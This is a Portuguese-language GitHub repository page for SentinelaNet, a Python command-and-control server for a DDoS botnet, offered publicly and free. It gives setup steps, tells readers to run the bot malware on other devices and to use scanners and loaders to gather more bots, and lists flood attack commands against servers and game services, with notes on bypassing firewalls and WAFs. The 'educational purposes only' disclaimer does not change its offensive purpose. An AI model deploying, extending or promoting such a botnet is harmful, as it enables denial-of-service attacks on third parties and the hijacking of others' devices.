Skip to content

SentinelaNet é uma CNC (Comando e Controle) em Python, projetada para gerenciar um malware que realiza ataques de disparos em massa (DDoS).

Notifications You must be signed in to change notification settings

CirqueiraDev/SentinelaNet

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

SentinelaNet

SentinelaNet é uma CNC (Comando e Controle) em Python, projetada para gerenciar um malware que realiza ataques de disparos em massa (DDoS).

Esta Botnet é para ser uma versão aprimorada do KryptonC2 e será disponibilizada publicamente e de forma gratuita.


Instalação 📁

git clone https://github.com/CirqueiraDev/SentinelaNet
cd SentinelaNet
pip install colorama
python3 cnc.py 1337

Os logins são salvos em logins.txt no formato "username:password" dentro do arquivo logins.txt


Configure o malware 💣

  • Mude o IP e a porta do bot.py com o IP (IP publico se não for um teste local) e a porta do seu servidor CNC depois salve o arquivo.

  • Depois execute o malware em outro dispositivo que suporte python (caso o alvo não tenha o python você pode tentar compilar o malware)

  • Tente usar Scanners e Loaders para carregar mais bots. OBS: não é possivel gerar um binario TOTALMENTE estático com python PURO!



Admin/root Commands

Command Description
!admin, !adm Shows list of admin commands
!user, !u Add/List/Remove users
!blacklist, !bl Add/List/Remove blacklisted targets

CNC Commands

Command Description
help, ? Shows list of commands
botnet Shows list of botnet attack methods
bots Shows all conected bots
stop Stop all your floods in progress
clear, cls Clears the console window screen
exit, logout Disconnects from the C&C server

Attack Commands

Command Usage Description
.UDP <target> <port> <time> Starts UDP Flood Bypass
.TCP <target> <port> <time> Starts TCP Flood Bypass
.OVHUDP <target> <port> <time> Starts OVH UDP Flood Bypass
.OVHTCP <target> <port> <time> Starts OVH TCP Flood Bypass
.MIX <target> <port> <time> Starts TCP and UDP Flood Bypass
.SYN <target> <port> <time> Starts TCP SYN Flood
.HEX <target> <port> <time> Starts HEXdecimal Flood
.VSE <target> <port> <time> Send Valve Source Engine Protocol
.MCPE <target> <port> <time> Minecraft PE Status Ping Protocol
.FIVEM <target> <port> <time> Send FiveM Status Ping Protocol
.HTTPGET <target> <port> <time> Starts HTTP/1.1 GET Flood
.HTTPPOST <target> <port> <time> Starts HTTP/1.1 POST Flood
.BROWSER <target> <port> <time> Starts HTTP/1.1 BROWSER Simulator Flood

📌 Sobre os ataques Ataques Implementados

🔹 Ataques Baseados em Rede (Camada 3 e 4 - UDP/TCP)

🟢 UDP Flood (attack_udp_bypass)

  • Envia pacotes UDP de tamanhos variados para sobrecarregar o alvo.
  • Pode ser mitigado por firewalls e rate-limiting de ISPs.

🟢 TCP Flood (attack_tcp_bypass)

  • Envia pacotes TCP continuamente para esgotar conexões do alvo.
  • Se não houver handshake adequado, pode ser bloqueado facilmente.

🟢 SYN Flood (attack_syn)

  • Envia requisições SYN para exaurir conexões TCP pendentes.
  • Eficaz contra servidores mal protegidos.
  • Firewalls modernos usam SYN Cookies para mitigar.

🟢 Ataque Híbrido (attack_tcp_udp_bypass)

  • Alterna entre TCP e UDP para confundir defesas.
  • Pode evitar filtros estáticos, mas ainda é detectável por análise comportamental.

🟢 OVH TCP Flood Malformado (attack_ovh_tcp)

  • Envia requisições HTTP falsas (PGET) com caminhos anômalos (/0/0/0/0, \0\0\0\0).
  • Aleatoriza bytes (0x00 a 0xFF) e terminadores de linha para burlar WAFs.
  • Usa múltiplas conexões TCP (connect, connect_ex) para saturar o servidor.
  • Mitigação: Firewalls com filtro de métodos HTTP inválidos e rate-limiting.

🟢 OVH UDP Flood com Payload Aleatório (attack_ovh_udp)

  • Inunda a porta alvo com datagramas UDP contendo payloads aleatórios (até 2048 bytes).
  • Não requer handshake, dificultando rastreamento.
  • Eficaz contra serviços UDP expostos (DNS, VoIP).
  • Mitigação: Bloqueio de tráfego UDP não essencial e análise comportamental.

🟢 OVH Ataque Híbrido (OVHTCP + OVHUDP)

  • Combina attack_ovh_tcp e attack_ovh_udp em threads paralelas.
  • Objetivo: Confundir defesas estáticas (ex: firewalls que bloqueiam apenas TCP).
  • Mitigação: Soluções anti-DDoS com detecção de padrões híbridos (ex: Cloudflare).

🔹 Ataques em Aplicações (Camada 7 - HTTP)

🔵 HTTP GET Flood (attack_http_get)

  • Simula acessos massivos a um site para sobrecarregar o servidor.
  • Pode ser mitigado por CAPTCHA, Cloudflare e Rate-Limiting.

🔵 HTTP POST Flood (attack_http_post)

  • Simula envio de dados para consumir processamento do servidor.
  • Mais difícil de mitigar que GET, mas pode ser bloqueado com autenticação ou regras de firewall.

🔵 Browser Emulation (attack_browser)

  • Simula tráfego de um navegador real para burlar proteções básicas.
  • Pode enganar bloqueios simples, mas não funciona contra defesas avançadas.

🔹 Ataques Específicos para Jogos

🎮 FiveM Attack (attack_fivem)

  • Explora vulnerabilidades no protocolo de comunicação do FiveM.
  • FiveM tem melhorado suas proteções, mas servidores mal configurados ainda podem ser afetados.

🎮 Minecraft PE Attack (attack_mcpe)

  • Envia pacotes corrompidos para explorar falhas na rede do jogo.
  • Pode afetar servidores sem proteção adequada, mas padrões desse ataque já são bloqueados em alguns serviços.

🎮 VSE Query Flood (attack_vse)

  • Explora o protocolo de consulta de servidores de jogos para gerar carga excessiva.
  • Muito utilizado contra servidores Source Engine (CS:GO, TF2, etc.).

⚠️ Nota: Este projeto é apenas para fins educacionais e de pesquisa. O uso indevido pode ser ilegal e resultar em penalidades legais. Sempre utilize conhecimento de segurança para proteger sistemas, não para atacá-los.



Novidades ✨

  • Atualizado CNC

    • Adicionado blacklist 01/03/2025
    • Atulizado comando bots 02/05/2025
      • Agora o comando bots exibe a quantidade de bots atualmente conectados ao C2, e organizados por arquitetura do sistema (por exemplo: x86_64, arm, mips) (também mostra a quantidade em cada arquitetura).
    • Comando STOP adicionado 09/05/2025
  • Atualizado Payload

    • Atualizado Browser Flood 01/03/2025
    • Atualizado UDP Flood Bypass 06/03/2025
    • Atualizado UDP Flood removed 06/03/2025
    • Adicionado TCP and UDP Flood Bypass 07/03/2025
    • Atualizado SYN Flood 07/03/2025
    • Adicionado OVHUDP and OVHTCP Flood Bypass 04/05/2025
    • OVH BUILDER Fixed 09/05/2025

Owner

About

SentinelaNet é uma CNC (Comando e Controle) em Python, projetada para gerenciar um malware que realiza ataques de disparos em massa (DDoS).

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages